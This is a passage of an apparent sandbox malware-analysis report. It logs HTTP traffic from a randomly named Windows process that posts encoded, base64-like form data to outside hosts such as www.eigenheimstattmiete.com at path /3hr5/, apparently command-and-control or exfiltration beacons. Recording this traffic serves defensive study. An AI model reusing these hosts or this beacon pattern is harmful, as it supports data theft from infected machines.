                                                                                                                              Data Ascii: rmEG6bVOykx/jAlvApgkeYm867sUtWRpsxHCBUzc2hrPkA8yfcaXO2JbRnrqp8cOEbF+WiP4fFO9DTJdfnH/shEVoZRltaVPpX3ZamCQJddVVpMphUu3WeFUMOw7WrEmD/MQhiI6e7PsJlnEExpuoUG/yu8lfqwlcs8mFSA2Ejg9N0sbXm3JZ4/YRMSLrn2osPDYNe/YIX2jdCrAxxZZ0qkWfN80YQQ8IZl1WMeZ2vgczOvTe1Z
                                                                                                                              Dec 4, 2023 15:24:40.914834976 CET5198OUTData Raw: 56 37 53 2b 30 62 6d 33 58 6a 53 66 4a 59 63 52 78 7a 55 70 72 64 48 53 36 4e 78 38 39 48 47 54 58 45 39 56 72 53 49 52 2f 69 63 63 4f 44 39 69 56 46 42 43 33 2f 34 55 76 36 51 48 78 69 6e 39 32 49 53 53 39 71 36 79 46 6e 4e 32 58 42 55 2b 6a 47
                                                                                                                              Data Ascii: V7S+0bm3XjSfJYcRxzUprdHS6Nx89HGTXE9VrSIR/iccOD9iVFBC3/4Uv6QHxin92ISS9q6yFnN2XBU+jGg65/FVboT0rZdWao/I9dnGY3/R3p45Go2bCXbrpO32veNDaC7meq5kKgg/vFmIsm1f6/r7d40j+c69hPVAcZnbVzODFwJ2e5LXDzeBukxbqVEA+nKY3S7nfklr9clJPYAo/8/ADZcNnknwaErlY5FO2E8K7qtSl4Z
                                                                                                                              Dec 4, 2023 15:24:40.914885044 CET2626OUTData Raw: 77 76 43 33 4a 74 50 54 71 64 50 79 33 38 69 56 56 58 42 4b 72 4f 67 4a 6c 42 35 51 53 70 6b 56 2b 6a 33 4c 66 5a 43 33 39 38 35 70 65 67 77 39 36 6e 4e 72 49 6d 31 6a 58 33 62 31 48 43 70 67 51 62 4b 46 7a 37 78 53 63 4f 4b 56 72 57 56 76 35 37
                                                                                                                              Data Ascii: wvC3JtPTqdPy38iVVXBKrOgJlB5QSpkV+j3LfZC3985pegw96nNrIm1jX3b1HCpgQbKFz7xScOKVrWVv57+1T+s4q01cGvhU8e8Zz+ucea8J59uMWY6s0jFk0slY2EskCEzDcTydv7qOToPVf/mem6+9wbg4nQgcb/afx22svRdPdpsm7+/AixcfP29apTwMhi/ri4TcAFPkp2oIitQM6Kubhd+oRANU1lmNkUCx9L93vMrADf3
                                                                                                                              Dec 4, 2023 15:24:40.915052891 CET2626OUTData Raw: 72 6a 75 51 5a 4c 53 4d 78 79 4b 44 43 49 65 35 30 69 70 50 6b 71 34 6a 31 6c 77 58 32 73 77 79 48 36 67 5a 44 64 51 71 37 4a 43 72 31 74 73 73 5a 2b 75 6f 79 51 61 39 43 73 4f 38 71 54 44 63 4a 4c 50 43 34 39 67 39 74 39 47 54 76 6e 68 45 67 6d
                                                                                                                              Data Ascii: rjuQZLSMxyKDCIe50ipPkq4j1lwX2swyH6gZDdQq7JCr1tssZ+uoyQa9CsO8qTDcJLPC49g9t9GTvnhEgmiV/OtCk5RbZZLjdj9Ke8hL5xsDz/KDfl01UG3mrWlygBWtBoSIZb96rcSwxIWwDuN++nXSiOXgfd/kFlrU1jTKqqL/RoVkNc/AXtKmihdmbjdlPnpI+BnOmj9oXg2ipHt4v5JyGfOaeTxPkW1px3zvj6JdUKIuz12
                                                                                                                              Dec 4, 2023 15:24:40.915235996 CET12914OUTData Raw: 2b 4b 68 70 61 54 77 72 57 30 53 55 67 4f 59 41 4a 67 58 31 37 43 33 78 59 50 36 57 44 7a 51 4a 69 32 64 64 45 50 39 71 73 6a 47 37 66 75 49 55 73 2b 38 37 53 68 2b 48 70 4f 49 55 31 51 72 51 67 76 44 47 48 4d 58 71 42 44 4b 31 35 33 64 6c 72 4b
                                                                                                                              Data Ascii: +KhpaTwrW0SUgOYAJgX17C3xYP6WDzQJi2ddEP9qsjG7fuIUs+87Sh+HpOIU1QrQgvDGHMXqBDK153dlrKLKq0TfNV1Y//rxM25sXZcHiHdnpAiPx6PIv348b26eWyAfHzOHNU1AGf2CX/PRbsWKoC7JBxtj2m+kqo74AMrFlMcTyxYVm68gxGfNu0AWi/WgjwexWSdBKEaoAI1GJ7h7gcRaFsDVQjhxorDiLEHmgHWcG3L2bgE
                                                                                                                              Dec 4, 2023 15:24:41.080981970 CET3912OUTData Raw: 53 4e 64 57 73 4f 55 58 33 77 37 49 63 2b 66 70 36 63 6b 74 64 72 38 48 59 39 64 36 50 55 77 64 47 78 46 48 55 4c 65 67 4f 38 4e 55 69 44 4f 4b 48 4f 71 6c 32 72 72 37 31 6c 64 48 2f 74 4f 7a 4a 4b 49 34 4e 50 64 43 6d 7a 66 49 30 38 46 2f 75 32
                                                                                                                              Data Ascii: SNdWsOUX3w7Ic+fp6cktdr8HY9d6PUwdGxFHULegO8NUiDOKHOql2rr71ldH/tOzJKI4NPdCmzfI08F/u2zYSWdm6Xy4UuG7Nt8Kt1P3yzDfn2w+LVSLH4a6n2Z6/lQ02v4frcO0/HW1qfHidvdmtSGYnAx+4bmvFVayCn8LBlt+Vn1g7ZcHddmGY446GU/iRyG+IRhUwnqM+bjiqXDdssMJDLOVUiptlxM4wfOXJyzgCVexsIP
                                                                                                                              Dec 4, 2023 15:24:41.081067085 CET9056OUTData Raw: 41 70 67 4b 35 4f 64 64 57 53 32 73 61 38 6c 63 43 51 36 6a 67 43 4f 78 53 55 79 4c 33 79 55 35 44 4e 68 6d 59 53 39 33 69 52 2f 30 63 33 53 45 77 65 58 73 76 71 5a 48 2b 43 30 6e 42 6a 39 32 73 6e 4e 45 4e 54 6c 48 48 2f 53 5a 31 4f 42 50 6f 58
                                                                                                                              Data Ascii: ApgK5OddWS2sa8lcCQ6jgCOxSUyL3yU5DNhmYS93iR/0c3SEweXsvqZH+C0nBj92snNENTlHH/SZ1OBPoX6r3ljRfoxXyuBPgkBZajTRSM9oo/SCVGD3Jlw3Mf/y/OTahhaitucSstr6Ehrn7FmID2aBlJ5UbdNxCxMWPlbRFu9c1mO3dIzZ8hbOTP1OmINc8oEwdJt62Xf6s/BFutkk/v6YFkPdJp95SVB8gBMb1ogvrLOTQcq
                                                                                                                              Dec 4, 2023 15:24:41.081331015 CET2092OUTData Raw: 54 77 32 47 70 6c 75 4d 62 4b 73 4c 2b 31 36 5a 75 62 65 2f 66 57 63 43 30 4e 47 58 37 41 6a 45 49 71 74 58 37 68 65 42 47 6b 38 2f 46 36 6d 32 72 58 53 6e 6e 70 6c 4f 68 59 72 73 4d 58 37 70 67 48 45 4e 41 52 50 6c 31 6f 4a 66 4c 45 48 6f 44 39
                                                                                                                              Data Ascii: Tw2GpluMbKsL+16Zube/fWcC0NGX7AjEIqtX7heBGk8/F6m2rXSnnplOhYrsMX7pgHENARPl1oJfLEHoD96NvzaGrVoCMgXkq65syDQYTznbDe+CpxZkn9tsSnh8naS3AMoVyfNGR81nHntsUcjz+fQFJKelfww1ybZWkDvWpY0N588hOCJpBiUxZexBBNSPBLPBSx+c/4Wt3I5IoNIOOfi64sfaxEUKNGQ/dVAJmU+Nne1GSUj


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.11.2050163104.232.106.165808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:43.434988022 CET528OUTGET /3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.080869.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:43.600462914 CET570INHTTP/1.1 301 Moved Permanently
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 04 Dec 2023 14:25:04 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Location: https://www.080869.com/3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.11.205016489.31.143.90808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:48.913009882 CET834OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.eigenheimstattmiete.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.eigenheimstattmiete.com
                                                                                                                              Referer: http://www.eigenheimstattmiete.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 72 4b 39 72 41 55 78 78 6c 47 6a 48 69 6e 53 73 39 76 44 50 67 58 76 49 66 33 77 54 6a 6a 61 57 6b 5a 54 4d 47 47 50 37 4b 4f 4e 44 4c 75 41 4e 56 4d 50 69 41 71 30 47 73 37 5a 6e 65 51 47 59 32 59 4c 63 6a 32 47 54 38 55 35 51 5a 65 6a 79 66 32 68 51 6b 38 38 5a 63 65 6a 4f 4b 6a 77 43 46 50 73 57 31 55 6c 44 7a 49 71 68 6e 78 49 6a 4f 32 33 63 72 43 41 61 6f 50 66 43 4b 77 77 37 50 49 5a 4c 47 50 56 34 53 56 49 53 4a 47 79 64 33 6d 34 67 39 54 2b 4f 42 6e 6b 31 57 6d 61 4c 54 7a 31 77 5a 48 41 4e 44 75 70 6d 4b 34 39 76 6c 41 3d 3d
                                                                                                                              Data Ascii: TZd=rK9rAUxxlGjHinSs9vDPgXvIf3wTjjaWkZTMGGP7KONDLuANVMPiAq0Gs7ZneQGY2YLcj2GT8U5QZejyf2hQk88ZcejOKjwCFPsW1UlDzIqhnxIjO23crCAaoPfCKww7PIZLGPV4SVISJGyd3m4g9T+OBnk1WmaLTz1wZHANDupmK49vlA==
                                                                                                                              Dec 4, 2023 15:24:49.093534946 CET387INHTTP/1.1 405 Not Allowed
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:49 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 154
                                                                                                                              Connection: close
                                                                                                                              Server: UD Webspace 3.2
                                                                                                                              Allow: GET, POST, HEAD
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.11.205016589.31.143.90808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:51.619982958 CET1174OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.eigenheimstattmiete.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.eigenheimstattmiete.com
                                                                                                                              Referer: http://www.eigenheimstattmiete.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 72 4b 39 72 41 55 78 78 6c 47 6a 48 67 45 61 73 75 38 37 50 73 6e 76 4c 54 58 77 54 73 44 61 53 6b 5a 76 4d 47 45 6a 72 4b 38 5a 44 4b 4d 49 4e 45 34 6a 69 44 71 30 47 6e 62 5a 6d 42 41 47 66 32 59 48 2b 6a 33 71 54 38 55 74 51 58 4d 72 79 4f 32 68 54 73 63 38 61 57 2b 6a 4e 48 44 77 49 46 50 77 30 31 51 74 44 77 34 32 68 6d 79 67 6a 45 44 44 54 36 79 41 63 39 66 66 4e 46 51 77 4c 50 49 6c 44 47 4f 74 53 54 6b 38 53 4a 6d 53 64 6c 32 34 76 7a 6a 2f 49 44 6e 6c 56 57 45 44 69 63 7a 31 43 44 44 6b 31 61 71 55 61 65 72 63 30 79 4d 45 72 51 34 53 47 57 4b 43 36 76 62 55 44 69 51 46 78 4d 57 4a 50 7a 54 77 35 49 67 5a 50 69 41 64 55 2f 6d 4c 58 52 75 37 37 30 4a 51 77 5a 31 45 68 41 55 4f 4c 73 72 41 66 65 35 58 2f 50 6f 71 42 65 52 4b 68 39 6f 43 49 38 56 6b 4c 6e 77 58 65 62 36 4d 68 71 6c 6e 4a 6c 53 47 75 58 70 66 58 51 77 4c 57 67 6c 69 51 38 69 74 62 48 2f 57 30 46 56 71 46 75 75 70 4c 5a 55 46 33 44 59 75 74 51 66 2b 34 4f 36 50 68 74 53 45 6f 6d 54 32 74 70 73 4b 68 62 4a 6d 4a 48 52 69 34 2f 42 58 33 78 71 4a 50 35 71 44 4a 48 2f 4b 55 31 74 67 36 33 4f 52 2b 69 79 4e 56 4e 64 50 41 41 69 59 48 58 4d 39 39 77 37 6d 4f 43 68 5a 50 6e 53 4d 34 63 69 45 48 50 53 71 52 4d 34 36 65 2f 65 6c 6d 4b 51 66 4b 44 35 43 7a 6a 69 5a 41 69 76 66 55 72 4d 61 54 58 4b 53 2b 63 5a 77 75 4a 50 48 32 4a 52 4f 58 6d 50 66 43 38 50 6e 6a 4a 47 34 6d 4c 2f 42 36 73 41 75 50 36 43 6e 4e 35 4c 70 46 76 58 63 62 62 6c 48 78 76 55 34 6c 36 4b 39 63 6c 41 30 52 51 74 4e 6a 73 63 4d 62 78 65 6d 55 5a 6a 46 54 6f 58 71 49 4e 73 50 4c 4f 2f 36 57 42 50 34 3d
                                                                                                                              Data Ascii: TZd=rK9rAUxxlGjHgEasu87PsnvLTXwTsDaSkZvMGEjrK8ZDKMINE4jiDq0GnbZmBAGf2YH+j3qT8UtQXMryO2hTsc8aW+jNHDwIFPw01QtDw42hmygjEDDT6yAc9ffNFQwLPIlDGOtSTk8SJmSdl24vzj/IDnlVWEDicz1CDDk1aqUaerc0yMErQ4SGWKC6vbUDiQFxMWJPzTw5IgZPiAdU/mLXRu770JQwZ1EhAUOLsrAfe5X/PoqBeRKh9oCI8VkLnwXeb6MhqlnJlSGuXpfXQwLWgliQ8itbH/W0FVqFuupLZUF3DYutQf+4O6PhtSEomT2tpsKhbJmJHRi4/BX3xqJP5qDJH/KU1tg63OR+iyNVNdPAAiYHXM99w7mOChZPnSM4ciEHPSqRM46e/elmKQfKD5CzjiZAivfUrMaTXKS+cZwuJPH2JROXmPfC8PnjJG4mL/B6sAuP6CnN5LpFvXcbblHxvU4l6K9clA0RQtNjscMbxemUZjFToXqINsPLO/6WBP4=
                                                                                                                              Dec 4, 2023 15:24:51.800884962 CET387INHTTP/1.1 405 Not Allowed
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:51 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 154
                                                                                                                              Connection: close
                                                                                                                              Server: UD Webspace 3.2
                                                                                                                              Allow: GET, POST, HEAD
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.11.205016689.31.143.90808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:54.325870037 CET3912OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.eigenheimstattmiete.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.eigenheimstattmiete.com
                                                                                                                              Referer: http://www.eigenheimstattmiete.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 72 4b 39 72 41 55 78 78 6c 47 6a 48 67 45 61 73 75 38 37 50 73 6e 76 4c 54 58 77 54 73 44 61 53 6b 5a 76 4d 47 45 6a 72 4b 38 42 44 4b 2f 51 4e 57 70 6a 69 43 71 30 47 6f 4c 5a 6a 42 41 47 4f 32 5a 76 36 6a 33 32 44 38 53 70 51 5a 2f 54 79 50 41 56 54 70 63 38 62 54 2b 6a 50 4b 6a 78 54 46 50 73 65 31 51 35 35 7a 4a 43 68 6e 77 34 6a 4f 55 66 63 79 43 41 61 39 66 66 37 55 41 77 74 50 49 67 59 47 4f 68 53 54 6d 34 53 4c 51 57 64 32 58 34 76 36 54 2f 48 4a 48 6c 61 66 6b 44 44 63 7a 52 38 44 44 6b 66 61 75 4d 61 65 6f 55 30 7a 4e 45 6f 52 59 53 47 59 71 43 31 72 62 59 50 69 51 49 33 4d 57 56 50 7a 51 77 35 49 41 5a 50 6e 68 64 62 72 57 4b 63 56 75 37 53 6a 35 63 34 5a 31 51 66 41 57 43 4c 73 62 6b 66 51 71 2f 2f 4a 4b 43 42 58 52 4b 6a 77 49 43 39 79 31 6b 70 6e 7a 75 39 62 2b 42 57 71 6d 4c 4a 6b 7a 6d 75 42 34 66 55 51 51 4c 55 38 31 6a 61 72 79 70 58 48 37 7a 31 46 56 72 49 75 72 4e 4c 5a 67 42 33 43 5a 75 75 54 50 2f 77 43 61 50 30 36 43 59 31 6d 54 37 68 70 73 79 4c 62 49 69 4a 47 78 69 34 36 68 72 77 35 61 4a 4d 6d 61 44 62 61 50 4b 50 31 71 6f 63 33 50 56 49 69 6d 46 56 4d 74 2f 41 46 79 59 41 42 38 39 78 6c 4c 6e 46 47 68 5a 50 6e 53 78 4a 63 69 49 48 4f 6a 53 52 4e 4b 69 65 36 50 6c 6d 5a 67 65 42 44 35 43 69 6a 69 55 2b 69 76 48 71 72 4d 72 2b 58 49 2b 2b 63 49 67 75 4f 4b 7a 35 4e 68 4f 53 69 50 66 76 34 50 71 35 4a 47 6b 2b 4c 2f 51 50 73 33 65 50 37 43 58 4e 75 62 70 47 71 33 63 63 59 6c 47 34 69 30 30 35 36 4b 67 70 6c 42 41 42 51 74 6c 6a 76 4a 39 61 75 66 43 77 48 51 4a 76 33 33 2b 43 43 2b 54 57 54 75 54 63 58 4c 6d 2b 77 77 62 36 63 7a 6e 33 33 79 6b 32 7a 30 62 79 44 6a 41 51 34 42 64 49 67 43 54 72 7a 30 46 61 45 67 6f 49 71 43 6e 77 30 52 68 56 42 64 4a 52 62 32 78 71 2b 6c 43 38 44 44 68 68 67 6a 38 69 32 44 62 4f 54 37 54 59 4b 65 74 50 74 46 55 42 2b 37 39 76 63 42 4e 66 55 2b 63 77 4d 35 38 54 78 6f 36 41 68 56 55 39 63 59 65 6e 4b 37 67 6b 6b 32 36 67 57 46 79 31 6f 30 6e 70 73 51 44 46 52 41 57 51 6f 6b 47 35 37 6a 68 2f 68 48 65 72 33 38 74 64 4d 73 47 4d 79 69 38 68 65 59 32 4f 4c 46 34 4c 59 56 67 4d 47 44 4b 50 38 30 53 46 74 5a 58 67 42 66 7a 34 56 61 67 75 72 2f 62 43 58 73 75 69 4d 38 57 31 71 46 57 55 65 63 44 42 62 4e 50 39 39 6e 6e 30 4e 6e 4d 66 4c 55 77 31 76 78 61 32 68 5a 4d 4d 48 45 46 51 4f 74 62 50 68 44 79 53 37 68 34 76 5a 49 44 6f 67 61 4e 41 2b 6c 6a 31 50 66 6b 42 53 43 75 65 4f 34 79 6a 69 77 4a 55 77 39 44 59 73 71 67 36 6b 65 63 51 38 4a 35 78 45 55 7a 73 32 31 45 55 71 42 74 68 34 6e 56 55 55 57 46 7a 52 6e 4b 6d 42 78 65 75 70 55 41 58 39 73 65 48 6a 6d 64 72 4f 68 47 44 55 62 6c 65 72 34 59 38 38 2f 77 6f 2b 33 4d 47 75 71 4f 6b 4d 30 32 65 74 77 59 30 31 6a 37 48 55 79 36 4b 4b 77 50 58 36 47 56 44 74 66 76 65 45 56 75 43 4b 32 6f 32 69 37 6e 6a 31 30 4e 69 69 2b 56 61 58 5a 69 75 43 55 43 66 55 64 7a 67 32 6b 55 35 74 61 44 39 6c 35 62 37 6a 2f 38 58 64 48 66 65 4e 38 47 59 56 62 78 50 31 77 51 6f 33 6d 68 71 72 77 55 4b 30 78 56 7a 51 58 78 39 6f 49 6b 67 45 42 74 30 5a 4c 77 78 73 73 79 52 4a 4b 7a 7a 6b 61 52 4f 33 51 6c 62 69 70 42 54 77 71 42 4d 73 47 5a 69 6c 49 2b 63 7a 59 42 43 34 4c 79 33 39 5a 50 2b 7a 67 30 6f 77 56 49 4a 78 6a 55 6e 61 55 4e 42 71 4f 61 6d 4f 55 34 6f 6e 75 6a 41 79 72 74 6e 4b 48 62 6c 34 51 74 65 63 62 34 61 74 7a 54 30 59 56 4b 77 63 74 64 73 33 56 38 50 4f 6e 79 44 55 47 31 32 70 6d 37 44 48 72 65 50 63 46 48 58 64 53 6d 4b 58 52 4e 6d 67 66 69 57 55 41 6d 31 69 30 76 76 2f 68 39 4c 6e 39 75 2f 6a 38 37 6d 4b 4b 4a 4c 4e 69 4f 66 59 50 67 66 48 37 46 77 2b 65 52 67 79 64 75 7a 6e 33 79 2f 74 58 63 43 2f 5a 46 63 6a 77 54 36 57 4c 46 78 58 66 45 78 6f 4e 44 77 4e 53 34 30 38 41 53 36 6d 59 6b 50 6f 44 74 59 74 32 38 73 39 73 36 6e 52 35 69 6b 43 70 59 74 61 36 67 52 5a 49 79 50 43 52 6e 52 34 75 2b 63 4d 43 50 69 49 56 37 54 36 49 2b 34 59 45 46 42 6e 30 61 47 39 72 33 75 2b 4e 4b 43 78 75 49 54 6c 6f 37 77 68 76 31 53 51 58 76 4a 76 61 6b 54 46 43 38 6b 41 2b 2f 64 6a 79 72 71 35 56 77 72 35 4d 6f 6f 69 6b 4a 45 68 71 78 6e 73 4c 42 43 69 4c 78 55 4a 43 2f 50 58 63 4b 69 66 61 56 30 48 6d 31 52 77 64 4c 49 45 66 54
                                                                                                                              Data Ascii: TZd=rK9rAUxxlGjHgEasu87PsnvLTXwTsDaSkZvMGEjrK8BDK/QNWpjiCq0GoLZjBAGO2Zv6j32D8SpQZ/TyPAVTpc8bT+jPKjxTFPse1Q55zJChnw4jOUfcyCAa9ff7UAwtPIgYGOhSTm4SLQWd2X4v6T/HJHlafkDDczR8DDkfauMaeoU0zNEoRYSGYqC1rbYPiQI3MWVPzQw5IAZPnhdbrWKcVu7Sj5c4Z1QfAWCLsbkfQq//JKCBXRKjwIC9y1kpnzu9b+BWqmLJkzmuB4fUQQLU81jarypXH7z1FVrIurNLZgB3CZuuTP/wCaP06CY1mT7hpsyLbIiJGxi46hrw5aJMmaDbaPKP1qoc3PVIimFVMt/AFyYAB89xlLnFGhZPnSxJciIHOjSRNKie6PlmZgeBD5CijiU+ivHqrMr+XI++cIguOKz5NhOSiPfv4Pq5JGk+L/QPs3eP7CXNubpGq3ccYlG4i0056KgplBABQtljvJ9aufCwHQJv33+CC+TWTuTcXLm+wwb6czn33yk2z0byDjAQ4BdIgCTrz0FaEgoIqCnw0RhVBdJRb2xq+lC8DDhhgj8i2DbOT7TYKetPtFUB+79vcBNfU+cwM58Txo6AhVU9cYenK7gkk26gWFy1o0npsQDFRAWQokG57jh/hHer38tdMsGMyi8heY2OLF4LYVgMGDKP80SFtZXgBfz4Vagur/bCXsuiM8W1qFWUecDBbNP99nn0NnMfLUw1vxa2hZMMHEFQOtbPhDyS7h4vZIDogaNA+lj1PfkBSCueO4yjiwJUw9DYsqg6kecQ8J5xEUzs21EUqBth4nVUUWFzRnKmBxeupUAX9seHjmdrOhGDUbler4Y88/wo+3MGuqOkM02etwY01j7HUy6KKwPX6GVDtfveEVuCK2o2i7nj10Nii+VaXZiuCUCfUdzg2kU5taD9l5b7j/8XdHfeN8GYVbxP1wQo3mhqrwUK0xVzQXx9oIkgEBt0ZLwxssyRJKzzkaRO3QlbipBTwqBMsGZilI+czYBC4Ly39ZP+zg0owVIJxjUnaUNBqOamOU4onujAyrtnKHbl4Qtecb4atzT0YVKwctds3V8POnyDUG12pm7DHrePcFHXdSmKXRNmgfiWUAm1i0vv/h9Ln9u/j87mKKJLNiOfYPgfH7Fw+eRgyduzn3y/tXcC/ZFcjwT6WLFxXfExoNDwNS408AS6mYkPoDtYt28s9s6nR5ikCpYta6gRZIyPCRnR4u+cMCPiIV7T6I+4YEFBn0aG9r3u+NKCxuITlo7whv1SQXvJvakTFC8kA+/djyrq5Vwr5MooikJEhqxnsLBCiLxUJC/PXcKifaV0Hm1RwdLIEfTMVKVnc7Qx7Ya3i8kGSgTzh1RR9WSq24X6OgweaP456bjkooCtUKtsSaA+9NuzbKG3Kt+Z21vPkp7ovVH5ZQQTRbcPMYmawIy0Nt1fD2HidMHT/ChKHcob63kSrs0UdRhfeOa0DriWxtcT3bHZjKuAV1cayaKcRqVO60MOmfSqtxeXozth5FOW2yKhI5RXT+awl/Z66wYbDn+jVKzC3/UDInKBRfoeEoNQ0HDtNjZrpxyRyfJ